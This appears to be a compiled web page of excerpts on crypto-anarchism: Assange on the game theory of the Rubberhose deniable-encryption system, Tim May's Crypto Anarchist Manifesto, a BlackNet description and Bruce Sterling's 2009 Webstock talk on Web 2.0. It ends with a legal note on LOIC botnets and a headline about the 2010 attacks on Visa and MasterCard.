Rubberhose (our rubber-hose proof filing system) addresses most of these technical issues, but I’d like to just comment on the best strategy game-theory wise, for the person wielding the rubber-hose. In Rubberhose the number of encrypted aspects (deniable “virtual” partitions) defaults to 16 (although is theoretically unlimited). As soon as you have over 4 pass-phrases, the excuse “I can’t recall” or “there’s nothing else there” starts to sound highly plauseable. Ordinarily best strategy for the rubber-hose wielder is to keep on beating keys out of (let us say, Alice) indefinitely till there are no keys left. However, and importantly, in Rubberhose, *Alice* can never prove that she has handed over the last key. As Alice hands over more and more keys, her attackers can make observations like “the keys Alice has divulged correspond to 85% of the bits”. However at no point can her attackers prove that the remaining 15% don’t simply pertain to unallocated space, and at no point can Alice, even if she wants to, divulge keys to 100% of the bits, in order to bring the un-divulged portion down to 0%. An obvious point to make here is that fraction-of-total-data divulged is essentially meaningless, and both parties know it – the launch code aspect may only take up .01% of the total bit-space. What I find interesting, is how this constraint on Alice’s behaviour actually protects her from revealing her own keys, because each party, at the outset can make the following observations:

Rubber-hose-squad:
We will never be able to show that Alice has revealed the last of her keys. Further, even if Alice has co-operated fully and has revealed all of her keys, she will not be able to prove it. Therefor, we must assume that at every stage that Alice has kept secret information from us, and continue to beat her, even though she may have revealed the last of her keys. But the whole time we will feel uneasy about this because Alice may have co-operated fully. Alice will have realised this though, and so presumably it’s going to be very hard to get keys out of her at all.

Alice:
(Having realised the above) I can never prove that I have revealed the last of my keys. In the end I’m bound for continued beating, even if I can buy brief respites by coughing up keys from time to time. Therefor, it would be foolish to divulge my most sensitive keys, because (a) I’ll be that much closer to the stage where I have nothing left to divulge at all (it’s interesting to note that this seemingly illogical, yet entirely valid argument of Alice’s can protect the most sensitive of Alice’s keys the “whole way though”, like a form mathematical induction), and (b) the taste of truly secret information will only serve to make my aggressors come to the view that there is even higher quality information yet to come, re-doubling their beating efforts to get at it, even if I have revealed all. Therefor, my best strategy would be to (a) reveal no keys at all or (b) depending on the nature of the aggressors, and the psychology of the situation, very slowly reveal my “duress” and other low-sensitivity keys. Alice certainly isn’t in for a very nice time of it (although she she’s far more likely to protect her data).

On the individual level, you would have to question whether you might want to be able to prove that, yes, infact you really have surrendered the last remaining key, at the cost of a far greater likelihood that you will. It really depends on the nature of your opponents. Are they intelligent enough understand the deniable aspect of the cryptosystem and come up with the above strategy? Determined to the aspect they are willing to invest the time and effort in wresting the last key out of you? Ruthless – do they say “Please”, hand you a Court Order, or is it more of a Room 101 affair? But there’s more to the story. Organisations and groups may have quite different strategic goals in terms of key retention vs torture relief to the individuals that comprise them, even if their views are otherwise co-aligned. A simple democratic union of two or more people will exhibit this behaviour. When a member of a group, who uses conventional cryptography to protect group secrets is rubber-hosed, they have two choices (1) defecting (by divulging keys) in order to save themselves, at the cost of selling the other individuals in the group down the river or (2) staying loyal, protecting the group and in the process subjugating themselves to continued torture. With Rubberhose-style deniable cryptography, the benefits to a group member from choosing tactic 1 (defection). are subdued, because they will never be able to convince their interrogators that they have defected. Rational individuals that are `otherwise loyal'” to the group, will realise the minimal gains to be made in chosing defection and choose tactic 2 (loyalty), instead. Presumably most people in the group do not want to be forced to give up their ability to choose defection. On the other hand, no one in the group wants anyone (other than themselves) in the group to be given the option of defecting against the group (and thus the person making the observation). Provided no individual is certain* they are to be rubber-hosed, every individual will support the adoption of a group-wide Rubberhose-style cryptographically deniable crypto-system. This property is communitive, while the individual’s desire to be able to choose defection is not. The former every group member wants for every other group member, but not themselves. The latter each group member wants only for themself.

* “certain” is a little misleading. Each individual has a threshold which is not only proportional to the the perceived likely hood of being rubberhosed over ones dislike of it, but also includes the number of indviduals in the group, the damage caused by a typical defection to the other members of the group etc.

Cheers, Julian

the CRYPTO-ANARCHIST MANIFESTO
http://en.wikipedia.org/wiki/Crypto-anarchism
http://www.activism.net/cypherpunk/crypto-anarchy.html
From: tcmay@netcom.com (Timothy C. May)
Subject: The Crypto Anarchist Manifesto
Date: Sun, 22 Nov 92

Cypherpunks of the World,
Several of you at the “physical Cypherpunks” gathering yesterday in Silicon Valley requested that more of the material passed out in meetings be available electronically to the entire readership of the Cypherpunks list, spooks, eavesdroppers, and all. Here’s the “Crypto Anarchist Manifesto” I read at the September 1992 founding meeting. It dates back to mid-1988 and was distributed to some like-minded techno-anarchists at the “Crypto ’88” conference and then again at the “Hackers Conference” that year. I later gave talks at Hackers on this in 1989 and 1990. There are a few things I’d change, but for historical reasons I’ll just leave it as is. Some of the terms may be unfamiliar to you…I hope the Crypto Glossary I just distributed will help. (This should explain all those cryptic terms in my .signature!) –Tim May

……………………………………………

The Crypto Anarchist Manifesto
by Timothy C. May

A specter is haunting the modern world, the specter of crypto anarchy. Computer technology is on the verge of providing the ability for individuals and groups to communicate and interact with each other in a totally anonymous manner. Two persons may exchange messages, conduct business, and negotiate electronic contracts without ever knowing the True Name, or legal identity, of the other. Interactions over networks will be untraceable, via extensive re- routing of encrypted packets and tamper-proof boxes which implement cryptographic protocols with nearly perfect assurance against any tampering. Reputations will be of central importance, far more important in dealings than even the credit ratings of today. These developments will alter completely the nature of government regulation, the ability to tax and control economic interactions, the ability to keep information secret, and will even alter the nature of trust and reputation.

The technology for this revolution–and it surely will be both a social and economic revolution–has existed in theory for the past decade. The methods are based upon public-key encryption, zero-knowledge interactive proof systems, and various software protocols for interaction, authentication, and verification. The focus has until now been on academic conferences in Europe and the U.S., conferences monitored closely by the National Security Agency. But only recently have computer networks and personal computers attained sufficient speed to make the ideas practically realizable. And the next ten years will bring enough additional speed to make the ideas economically feasible and essentially unstoppable. High-speed networks, ISDN, tamper-proof boxes, smart cards, satellites, Ku-band transmitters, multi-MIPS personal computers, and encryption chips now under development will be some of the enabling technologies.

The State will of course try to slow or halt the spread of this technology, citing national security concerns, use of the technology by drug dealers and tax evaders, and fears of societal disintegration. Many of these concerns will be valid; crypto anarchy will allow national secrets to be trade freely and will allow illicit and stolen materials to be traded. An anonymous computerized market will even make possible abhorrent markets for assassinations and extortion. Various criminal and foreign elements will be active users of CryptoNet. But this will not halt the spread of crypto anarchy.

Just as the technology of printing altered and reduced the power of medieval guilds and the social power structure, so too will cryptologic methods fundamentally alter the nature of corporations and of government interference in economic transactions. Combined with emerging information markets, crypto anarchy will create a liquid market for any and all material which can be put into words and pictures. And just as a seemingly minor invention like barbed wire made possible the fencing-off of vast ranches and farms, thus altering forever the concepts of land and property rights in the frontier West, so too will the seemingly minor discovery out of an arcane branch of mathematics come to be the wire clippers which dismantle the barbed wire around intellectual property. Arise, you have nothing to lose but your barbed wire fences!

………………………………………………………………..

Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay@netcom.com | anonymous networks, digital pseudonyms, zero
408-688-5409 | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA | black markets, collapse of governments.
Higher Power: 2^756839 | PGP Public Key: by arrangement.

BLACKNET
http://www.kk.org/outofcontrol/ch12-a.html
http://www.cypherpunks.to/faq/cyphernomicron/cyphernomicon.txt

“What is BlackNet?”
” — an experiment in information markets, using anonymous message pools for exchange of instructions and items. Tim May’s experiment in guerilla ontology.
— an experimental scheme devised by T. May to underscore the nature of anonymous information markets. “Any and all” secrets can be offered for sale via anonymous mailers and message pools. The experiment was leaked via remailer to the Cypherpunks list (not by May) and thence to several dozen Usenet groups by Detweiler. The authorities are said to be investigating it.”

SOME CONTEXT : the BRIEF but GLORIOUS LIFE of WEB 2.0, and WHAT COMES AFTER
http://www.wired.com/beyond_the_beyond/2009/03/what-bruce-ster/
What Bruce Sterling Actually Said About Web 2.0 at Webstock 09
by Bruce Sterling  / March 1, 2009

{By the garbled reportage, I’d be guessing some of those kiwis were having trouble with my accent. Here are the verbatim remarks.}

So, thanks for having me cross half the planet to be here. So, just before I left Italy, I was reading an art book. About 1902, because we futurists do that. And it had this comment in it by Walter Pater that reminded me of your problems. Walter Pater was a critic and an artist of Art Nouveau. There was a burst of Art Nouveau in Turin in 1902 — because what Arts and Crafts always needed was some rich industrialists. Rich factory owners were the guys who bought those elaborate handmade homes and the romantic paintings of the Lady of Shalott. Fantastic anti-industrial structures were financed by heavy industry.

I know that sounds ironic or even sarcastic, but it isn’t. Creative energies are liberated by oxymorons, by breakdowns in definitions. The Muse comes out when you look sidelong, over your shoulder. So Walter Pater was a critic, like me, so of course he’s complaining. The Italians in 1902 don’t understand the original doctrines of the PreRaphaelites and Ruskin and William Morris! That’s his beef. The Italians just think that Art Nouveau has a lot of curvy lines in it, and it’s got something to do with nude women and vegetables! They’re just seizing on the superficial appearances! In Italy they call that stuff “Flower Style.”

And that’s your problem, too, here in New Zealand. Far from the action here at the antipodes, you people, you just don’t get it about the original principles of Web 2.0! Too often, you’ve got no architecture of participation, sometimes you don’t have an open API! Out here at the end of the earth, you think it’s all about drop shadows and the gradients and a tag cloud, and a startup name with a Capital R in the middle of it!

And that’s absolutely the way of the world… nothing any critic can do about it. People do make mistakes, they interpret things wrongly — but more to the point, they DELIBERATELY make mistakes in creative work. Creative people don’t want to “do it right.” They want to share the excitement you had when you yourself didn’t know how to do it right. Creative people are unconsciously attracted by the parts that make no sense. And Web 2.0 was full of those.

I want you to know that I respect Web 2.0. I sincerely think it was a great success. Art Nouveau was not a success — it had basic concepts that were seriously wrongheaded. Whereas Web 2.0 had useful, sound ideas that were creatively vague. It also had things in it that pretended to be ideas, but were not ideas at all: they were attitudes. In web critical thinking, this effort, Web 2.0, was where it was at. Web 2.0 has lost its novelty value now, but it’s not dead. It’s been realized: it has spread worldwide.

It’s Web 1.0 that is dead. Web 1.0 was comprehensively crushed by Web 2.0, Web 2.0 fell flaming on top of web 1.0 and smashed it to rubble.

Web 2.0 is Wikipedia, while web 1.0 is Britannica Online. “What? Is Britannica online? Why?”

Web 2.0 is FlickR, while web 1.0 is Ofoto. “Ofoto? I’ve never even heard of Ofoto.”

Web 2.0 is search engines and Web 1.0 is portals. “Yeah man, I really need a New Zealand portal! I don’t think I can handle that information superhighway without a local portal!”

What do we talk about when we say “Web 2.0?” Luckily, we have a canonical definition! Straight from the originator! Mr Tim O’Reilly! Publisher, theorist, organizer, California tech guru: “Web 2.0 is the network as platform, spanning all connected devices; Web 2.0 applications are those that make the most of the intrinsic advantages of that platform: delivering software as a continually-updated service that gets better the more people use it, consuming and remixing data from multiple sources, including individual users, while providing their own data and services in a form that allows remixing by others, creating network effects through an ‘architecture of participation,’ and going beyond the page metaphor of Web 1.0 to deliver rich user experiences.”

I got all interested when I heard friends discussing web 2.0, so I swiftly went and read that definition. After reading it a few times, I understood it, too. But — okay, is that even a sentence? A sentence is a verbal construction meant to express a complete thought. This congelation that Tim O’Reilly constructed, that is not a complete thought. It’s a network in permanent beta. We might try to diagram that sentence. Luckily Tim did that for us already. Here it is.

The nifty-keen thing here is that Web 2.0 is a web. It’s a web of bubbles and squares. A glorious thing — but that is not a verbal argument. That’s like a Chinese restaurant menu. You can take one bubble from sector A, and two from sector B, and three from sector C, and you are Web 2.0. Feed yourself and your family! Take away all the bubbles, and put some people there instead. Web 2.0 becomes a Tim O’Reilly conference. This guy is doing x, and that guy is doing y, and that woman is the maven of doing z. Do these people want to talk to each other? Do they have anything to say and share? You bet they do. Through in some catering and scenery, and it’s very Webstock.

Web 2.0 theory is a web. It’s not philosophy, it’s not ideology like a political platform, it’s not even a set of esthetic tenets like an art movement. The diagram for Web 2.0 is a little model network. You can mash up all the bubbles to the other bubbles. They carry out subroutines on one another. You can flowchart it if you want. There’s a native genius here. I truly admire it. This chart is five years old now, which is 35 years old in Internet years, but intellectually speaking, it’s still new in the world. It’s alarming how hard it is to say anything constructive about this from any previous cultural framework.

The things that are particularly stimulating and exciting about Web 2.0 are the bits that are just flat-out contradictions in terms. Those are my personal favorites, the utter violations of previous common sense: the frank oxymorons. Like “the web as platform.” That’s the key Web 2.0 insight: “the web as a platform.” Okay, “webs” are not “platforms.” I know you’re used to that idea after five years, but consider taking the word “web” out, and using the newer sexy term, “cloud.” “The cloud as platform.” That is insanely great. Right? You can’t build a “platform” on a “cloud!” That is a wildly mixed metaphor! A cloud is insubstantial, while a platform is a solid foundation! The platform falls through the cloud and is smashed to earth like a plummeting stock price!

Imagine that this was financial thinking — instead of web design thinking. We take a bunch of loans, we mash them together and turn them into a security. Now securities are secure, right? They are triple-A solid! So now we can build more loans on top of those securities. Ingenious! This means the price of credit trends to zero, so the user base expands radically, so everybody can have credit! Nobody could have tried that before, because that sounds like a magic Ponzi scheme. But luckily, we have computers in banking now. That means Moore’s law is gonna save us! Instead of it being really obvious who owes what to whom, we can have a fluid, formless ownership structure that’s always in permanent beta. As long as we keep moving forward, adding attractive new features, the situation is booming!

Now, I wouldn’t want to claim that Web 2.0 is as frail as the financial system — the financial system that supported it and made it possible! But Web 2.0 is directly built on top of finance. Web 2.0 is supposed to be business. This isn’t a public utility or a public service, like the old model of an Information Superhighway established for the public good. The Information Superhighway is long dead — it was killed by Web 1.0. And web 2.0 kills web 1.0.

Actually, you don’t simply kill those earlier paradigms. What you do is turn them into components, then make the components into platforms, then place more fresh components on top. That is native web logic. The World Wide Web sits on top of a turtle, and then below that is an older turtle, and that sits on the older turtle. You don’t have to feel fretful about that situation — because it’s turtles all the way down.

Now, we don’t have to think about it in that particular way. The word “turtles” makes it sound absurd and scary, like a myth or a confidence trick. We can try another, very different metaphor — as Tim O’Reilly once offered us. “Like many important concepts, Web 2.0 doesn’t have a hard boundary, but rather, a gravitational core. You can visualize Web 2.0 as a set of principles and practices that tie together a veritable solar system of sites that demonstrate some or all of those principles, at a varying distance from that core.”

Okay, now we’ve got this kind of asteroid rubble of small pieces loosely joined. As a science fiction writer, I truly love that metaphor. That’s the web. Web pieces are held by laws of gravity, and supposedly the sun isn’t gonna do anything much. Right? The sun is four and half billion years old, it’s very old and stable. Although the web sure isn’t. Let’s look at a few of these Web 2.0 principles and practices.

“Tagging not taxonomy.” Okay, I love folksonomy, but I don’t think it’s gone very far. There have been books written about how ambient searchability through folksonomy destroys the need for any solid taxonomy. Not really. The reality is that we don’t have a choice, because we have no conceivable taxonomy that can catalog the avalanche of stuff on the Web. We have no army of human clerks remotely able to tackle that work. We don’t even have permanent reference sites where we can put data so that we can taxonomize it.

“An attitude, not a technology.” Okay, attitudes are great, but they’re never permanent. Even technologies aren’t permanent, and an attitude about technology is a vogue. It’s a style. It’s certainly not a business. Nobody goes out and sells a kilo of attitude. What is attitude doing in there? Everything, of course. In Web 2.0 the attitude was everything.

Then there’s AJAX. Okay, I freakin’ love AJAX. Jesse James Garrett is a benefactor of mankind. I thank God for this man and his willingness to look sympathetically at users and the hell they experience. People use AJAX instead of evil static web pages, and people literally weep with joy. But what is AJAX, exactly? It’s not an acronym. It doesn’t really stand for “Asynchronous Java and XTML.” XTML itself is an acronym — you can’t make an acronym out of an acronym! You peel that label off and AJAX is revealed as a whole web of stuff.

AJAX is standards-based presentation using XHTML and CSS. AJAX is also dynamic display and interaction using the Document Object Model. AJAX is also data interchange and manipulation using XML and XSLT; AJASX is also asynchronous data retrieval using XML-http request. With JavaScript binding everything. Okay, that was AJAX, and every newbie idiot knows that Web 2.0 is made of AJAX. “AJAX with JavaScript binding everything.” JavaScript binding everything — like the law of gravity, like there’s a sun somewhere. Okay, that sounds reassuring, but suppose something goes wrong with the sun. Sun were the guys who built JavaScript, if you recall. That sounds kind of alarming… because Sun’s JavaScript, the binder of AJAX, is the core of the Web 2.0 rich user experience.

JavaScript is the duct tape of the Web. Why? Because you can do anything with it. It’s not the steel girders of the web, it’s not the laws of physics of the web. Javascript is beloved of web hackers because it’s an ultimate kludge material that can stick anything to anything. It’s a cloud, a web, a highway, a platform and a floor wax. Guys with attitude use JavaScript.

There’s something truly glorious about this. Glorious, and clearly hazardous, bottom-up and make-do. I’m not gonna say that I will eat my own hat if the Internet doesn’t collapse by 1995. Guys say that — Metcalfe said it — he had to eat the damn hat. That doomsayer, man, he deserved it. He invented Ethernet, so what did he ever know about networking.

What I have to wonder is: how much of Javascript’s great power is based on an attitude that Javascript is up to the job? Duct-taping the turtles all the way down. I certainly don’t want to give up Javascript — but is Sun the center of the web 2.0 solar system? Sun’s not lookin’ real great right now, is it? That is our solid platform, our foundation? Can you have Javascript without a sun? Duct-tape in the dark?

eBay reputations and Amazon reviews. “User as contributor.” Are “user” and “contributor” the right words for the people interacting with Amazon? Let’s suppose there’s a change of attitude within Amazon; they’re going broke, they’re desperate, the stock price has cratered, and they really have to turn the screws on their users and contributors. Then what happens? This is a social attitude kinda held together with Javascript and duct tape, isn’t it? I mean, Amazon used to sell books. Right? You might want to talk to some publishers and booksellers about the nature of their own relationship with Amazon. They don’t use nice terms like “user and contributor.” They use terms like “collapse, crash, driven out of business.”

The publishing business is centuries old and bookstores have been around for millennia. Is Amazon gonna last that long? Are they a great force for our stability? Are we betting the farm on the Web 2.0 attitude of these guys?

Blogs — “participation not publishing.” Okay, I love my blog. Mostly because there’s never been any damn participation in it. My blog has outlived 94 percent of all blogs every created. I’ve got an ancient turtle of a blog. I may also have one of the last blogs surviving in the future, because the rest were held together with duct tape and attitude. Try going around looking for a weblog now that is literally a log of some guy’s websurfing activities. Most things we call “blogs” are not “weblogs” any more. Even MY ancient writer-style blog isn’t quite a weblog. My blog isn’t participatory, but it’s got embedded videos, FlickR photos, links to MP3s.

You can go read my blog from four years ago. Five years ago. Still sitting there in the server. Absolutely consumed with link-rot. I’m blogged to stuff that has vanished into the ether, it’s gone into 404land. It had “granular addressibility,” just like Tim recommends here, but those granules were blown away on the burning solar wind.

Not that I’m the Metcalfe prophet of doom here — there were more granules. Sure. I got supergranules. I get granules direct from Tim O’Reilly’s tweets now, I get 140-character granules. And man, those are some topnotch tweets. Tim O’Reilly is my favorite Twitter contact. He is truly the guru. I don’t know anybody who can touch him. I also know that the Fail Whale is the best friend of everybody on Twitter. He’s not a frail little fail minnow, either. The Fail Whale is a big burly beast, he’s right up there with the dinosaurs.

Let me throw in a few more Web 2.0 oxymorons here because, as a novelist, these really excite me. “Web platform,” of course — that one really ranks with ‘wireless cable,’ there’s something sublime about it…

“Business revolution.” Web 2.0 was often described as a “business revolution.” Web 1.0 was also a business revolution — and it went down in flames with the Internet Bubble. That was when all the dotcom investors retreated to the rock-solid guaranteed stability of real-estate. Remember that?

Before the 1990s, nobody had any “business revolutions.” People in trade are supposed to be very into long-term contracts, a stable regulatory environment, risk management, and predictable returns to stockholders. Revolutions don’t advance those things. Revolutions annihilate those things. Is that “businesslike”? By whose standards?

“Dynamic content.” Okay, content is a stable substance that is put inside a container. It’s stored in there: that’s why you put it inside. If it is dynamically flowing through the container, that’s not a container. That is a pipe. I really like dynamic flowing pipes, but since they’re not containers, you can’t freakin’ label them!

“Collective intelligence.” Okay, there is definitely something important and powerful and significant and revolutionary here. Google’s got “collective intelligence.” I don’t think there’s a revolutionary in the world who doesn’t use Google. Everybody who bitches about Google uses Google.

I use Google all the time. I don’t believe Google is evil. I’m quite the fan of Sergey and Larry: they are like the coolest Stanford dropouts ever. I just wonder what kind of rattletrap duct-taped mayhem is disguised under a smooth oxymoron like “collective intelligence.” You got to call it something — and “collective intelligence” is surely a lot better than retreating to crazed superstition and calling it “the sacred daemon spirits of Mountain View who know everything.”

But if collective intelligence is an actual thing — as opposed to an off-the-wall metaphor — where is the there there? Google’s servers aren’t intelligent. Google’s algorithms aren’t intelligent. You can learn fantastic things off Wikipedia in a few moments, but Wikipedia is not a conscious, thinking structure. Wikipedia is not a science fiction hive mind. Furthermore, the people whose granular bits of input are aggregated by Google are not a “collective.” They’re not a community. They never talk to each other. They’ve got basically zero influence on what Google chooses to do with their mouseclicks. What’s “collective” about that?

Talking about “collective intelligence” is like talking about “the invisible hand of the market.” Markets don’t have any real invisible hands. That is a metaphor. And “collective intelligence” doesn’t have any human will or any consciousness. “Collective intelligence” isn’t intelligently trying to make our lives better, it’s not an abstract force for good.

“Collective credit-card fraud intelligence” — that is collective intelligence, too. “Collective security-vulnerabilities intelligence” — that’s powerful, it’s incredibly fast, it’s not built by any one guy in particular, and it causes billions of dollars of commercial damage and endless hours of harassment and fear to computer users.

I really think it’s the original sin of geekdom, a kind of geek thought-crime, to think that just because you yourself can think algorithmically, and impose some of that on a machine, that this is “intelligence.” That is not intelligence. That is rules-based machine behavior. It’s code being executed. It’s a powerful thing, it’s a beautiful thing, but to call that “intelligence” is dehumanizing. You should stop that. It does not make you look high-tech, advanced, and cool. It makes you look delusionary.

There’s something sad and pathetic about it, like a lonely old woman whose only friends are her cats. “I had to leave my 14 million dollars to Fluffy because he loves me more than all those poor kids down at the hospital.” This stuff we call “collective intelligence” has tremendous potential, but it’s not our friend — any more than the invisible hand of the narcotics market is our friend.

Markets look like your friend when they’re spreading prosperity your way. If they get some bug in their ear from their innate Black Swan instability, man, markets will starve you! The Invisible Hand of the market will jerk you around like a cat of nine tails. So I’d definitely like some better term for “collective intelligence,” something a little less streamlined and metaphysical. Maybe something like “primeval meme ooze” or “semi-autonomous data propagation.” Even some Kevin Kelly style “neobiological out of control emergent architectures.” Because those weird new structures are here, they’re growing fast, we depend on them for mission-critical acts, and we’re not gonna get rid of them any more than we can get rid of termite mounds.

So, you know, whatever next? Web 2.0, five years old, and sounding pretty corny now. I loved Web 2.0 — I don’t want to be harsh or dismissive about it. Unlike some critics, I never thought it was “nonsense” or “just jargon.” There were critics who dismissed Tim’s solar system of ideas and attitudes there. I read those critics carefully, I thought hard about what they said. I really thought that they were philistines, and wrong-headed people. They were like guys who dismissed Cubism or Surrealism because “that isn’t really painting.”

Web 2.0 people were a nifty crowd. I used to meet, interview computer people… the older mainframe crowd, Bell Labs engineers and such. They were smarter than Web 2.0 people because they were a super-selected technical elite. They were also boring bureaucrats and functionaries. All the sense of fun, the brio had been boiled out of them, and their users were hapless ignoramus creatures whom they despised.

The classic Bell subset telephone, you know, black plastic shell, sturdy rotary dial… For God’s sake don’t touch the components! That was their emblem. They were creatures of their era, they had the values of their era, that time is gone and we have the real 21st century on our hands. I am at peace with that. I’m not nostalgic. “Even nostalgia isn’t what it used to be.”

Web 2.0 guys: they’ve got their laptops with whimsical stickers, the tattoos, the startup T-shirts, the brainy-glasses — you can tell them from the general population at a glance. They’re a true creative subculture, not a counterculture exactly — but in their number, their relationship to the population, quite like the Arts and Crafts people from a hundred years ago.

Arts and Crafts people, they had a lot of bad ideas — much worse ideas than Tim O’Reilly’s ideas. It wouldn’t bother me any if Tim O’Reilly was Governor of California — he couldn’t be any weirder than that guy they’ve got already. Arts and Crafts people gave it their best shot, they were in earnest — but everything they thought they knew about reality was blown to pieces by the First World War.

After that misfortune, there were still plenty of creative people surviving. Futurists, Surrealists, Dadaists — and man, they all despised Arts and Crafts. Everything about Art Nouveau that was sexy and sensual and liberating and flower-like, man, that stank in their nostrils. They thought that Art Nouveau people were like moronic children.

So — what does tomorrow’s web look like? Well, the official version would be ubiquity. I’ve been seeing ubiquity theory for years now. I’m a notorious fan of this stuff. A zealot, even. I’m a snake-waving street-preacher about it. Finally the heavy operators are waking from their dogmatic slumbers; in the past eighteen months, 24 months, we’ve seen ubiquity initiatives from Nokia, Cisco, General Electric, IBM… Microsoft even, Jesus, Microsoft, the place where innovative ideas go to die.

But it’s too early for that to be the next stage of the web. We got nice cellphones, which are ubiquity in practice, we got GPS, geolocativity, but too much of the hardware just isn’t there yet. The batteries aren’t there, the bandwidth is not there, RFID does not work well at all, and there aren’t any ubiquity pure-play companies.

So I think what comes next is a web with big holes blown in it. A spiderweb in a storm. The turtles get knocked out from under it, the platform sinks through the cloud. A lot of the inherent contradictions of the web get revealed, the contradictions in the oxymorons smash into each other. The web has to stop being a meringue frosting on the top of business, this make-do melange of mashups and abstraction layers.

Web 2.0 goes away. Its work is done. The thing I always loved best about Web 2.0 was its implicit expiration date. It really took guts to say that: well, we’ve got a bunch of cool initiatives here, and we know they’re not gonna last very long. It’s not Utopia, it’s not a New World Order, it’s just a brave attempt to sweep up the ashes of the burst Internet Bubble and build something big and fast with the small burnt-up bits that were loosely joined.

That showed more maturity than Web 1.0. It was visionary, it was inspiring, but there were fewer moon rockets flying out of its head. “Gosh, we’re really sorry that we accidentally ruined the NASDAQ.” We’re Internet business people, but maybe we should spend less of our time stock-kiting. The Web’s a communications medium — how ’bout working on the computer interface, so that people can really communicate? That effort was time well spent. Really.

A lot of issues that Web 1.0 was sweating blood about, they went away for good. The “digital divide,” for instance. Man, I hated that. All the planet’s poor kids had to have desktop machines. With fiber optic. Sure! You go to Bombay, Shanghai, Lagos even, you’re like “hey kid, how about this OLPC so you can level the playing field with the South Bronx and East Los Angeles?” And he’s like “Do I have to? I’ve already got three Nokias.” The teacher is slapping the cellphone out of his hand because he’s acing the tests by sneaking in SMS traffic.

“Half the planet has never made a phone call.” Boy, that’s a shame — especially when pirates in Somalia are making satellite calls off stolen supertankers. The poorest people in the world love cellphones. They’re spreading so fast they make PCs look like turtles. Digital culture, I knew it well. It died — young, fast and pretty. It’s all about network culture now.

We’ve got a web built on top of a collapsed economy. THAT’s the black hole at the center of the solar system now. There’s gonna be a Transition Web. Your economic system collapses: Eastern Europe, Russia, the Transition Economy, that bracing experience is for everybody now. Except it’s not Communism transitioning toward capitalism. It’s the whole world into transition toward something we don’t even have proper words for.

The Web has always had an awkward relationship with business. Web 2.0 was a business model. The Transition Web is a culture model. If it’s gonna work, it’s got to replace things that we used to pay for with things that we just plain use. In Web 2.0, if you were monetizable, it meant you got bought out by the majors. “We stole back our revolution and we sold ourselves to Yahoo.” Okay, that was embarrassing, but at least it meant you could scale up and go on. In the Transition Web, if you’re monetizable, it means that you get attacked. You gotta squeeze a penny out of every pixel because the owners are broke. But if you do that to your users, they will vaporize, because they’re broke too, just like you; of course they’re gonna migrate to stuff that’s free.

After a while you have to wonder if it’s worth it — the money model, I mean. Is finance worth the cost of being involved with the finance? The web smashed stocks. Global banking blew up all over the planet all at once… Not a single country anywhere with a viable economic policy under globalization. Is there a message here? Are there some non-financial structures that are less predatory and unstable than this radically out-of-kilter invisible hand? The invisible hand is gonna strangle us! Everybody’s got a hand out — how about offering people some visible hands?

Not every Internet address was a dotcom. In fact, dotcoms showed up pretty late in the day, and they were not exactly welcome. There were dot-orgs, dot edus, dot nets, dot govs, and dot localities. Once upon a time there were lots of social enterprises that lived outside the market; social movements, political parties, mutual aid societies, philanthropies. Churches, criminal organizations — you’re bound to see plenty of both of those in a transition… Labor unions… not little ones, but big ones like Solidarity in Poland; dissident organizations, not hobby activists, big dissent, like Charter 77 in Czechoslovakia.

Armies, national guards. Rescue operations. Global non-governmental organizations. Davos Forums, Bilderberg guys. Retired people. The old people can’t hold down jobs in the market. Man, there’s a lot of ‘em. Billions. What are our old people supposed to do with themselves? Websurf, I’m thinking. They’re wise, they’re knowledgeable, they’re generous by nature; the 21st century is destined to be an old people’s century. Even the Chinese, Mexicans, Brazilians will be old. Can’t the web make some use of them, all that wisdom and talent, outside the market?

Market failures have blown holes in civil society. The Greenhouse Effect is a market failure. The American health system is a market failure — and most other people’s health systems don’t make much commercial sense. Education is a loss leader and the university thing is a mess. Income disparities are insane. The banker aristocracy is in hysterical depression. Housing is in wreckage; the market has given us white-collar homeless and a million empty buildings. The energy market is completely freakish. If you have no fossil fuels, you shiver in the dark. If you do have them, your economy is completely unstable, your government is corrupted and people kill you for oil. The human trafficking situation is crazy. In globalization people just evaporate over borders. They emigrate illegally and grab whatever cash they can find. If you don’t export you go broke from trade imbalances. If you do export, you go broke because your trading partners can’t pay you…

Kinda hard to face up to all this, especially when it’s laid out in this very bald fashion. But you know, I’m not scared by any of this. I regret the suffering, I know it’s big trouble — but it promises massive change and a massive change was inevitable. The way we ran the world was wrong.

I’ve never seen so much panic around me, but panic is the last thing on my mind. My mood is eager impatience. I want to see our best, most creative, best-intentioned people in world society directly attacking our worst problems. I’m bored with the deceit. I’m tired of obscurantism and cover-ups. I’m disgusted with cynical spin and the culture war for profit. I’m up to here with phony baloney market fundamentalism. I despise a prostituted society where we put a dollar sign in front of our eyes so we could run straight into the ditch.

The cure for panic is action. Coherent action is great; for a scatterbrained web society, that may be a bit much to ask. Well, any action is better than whining. We can do better. I’m not gonna tell you what to do. I’m an artist, I’m not running for office and I don’t want any of your money. Just talk among yourselves. Grow up to the size of your challenges. Bang out some code, build some platforms you don’t have to duct-tape any more, make more opportunities than you can grab for your little selves, and let’s get after living real lives. The future is unwritten. Thank you very much.

NOTE: “Participating in a botnet with the intention of shutting down a Web site violates the Computer Fraud and Abuse Act,” said Jennifer Granick, a lawyer at Zwillinger Genetski who specializes in Internet law and hacking cases. “The thing people need to understand is that even if you have a political motive, it doesn’t change the fact that the activity is unlawful.” Also, LOIC protesters’ IP addresses are not masked, so attacks can be traced back to the computers launching them.

ANONYMOUS ATTACKS
http://wlcentral.org/node/528
http://www.guardian.co.uk/world/2010/dec/08/wikileaks-visa-mastercard-operation-payback
WikiLeaks supporters disrupt Visa and MasterCard sites in ‘Operation Payback’
by Esther Addley and Josh Halliday / 9 December 2010

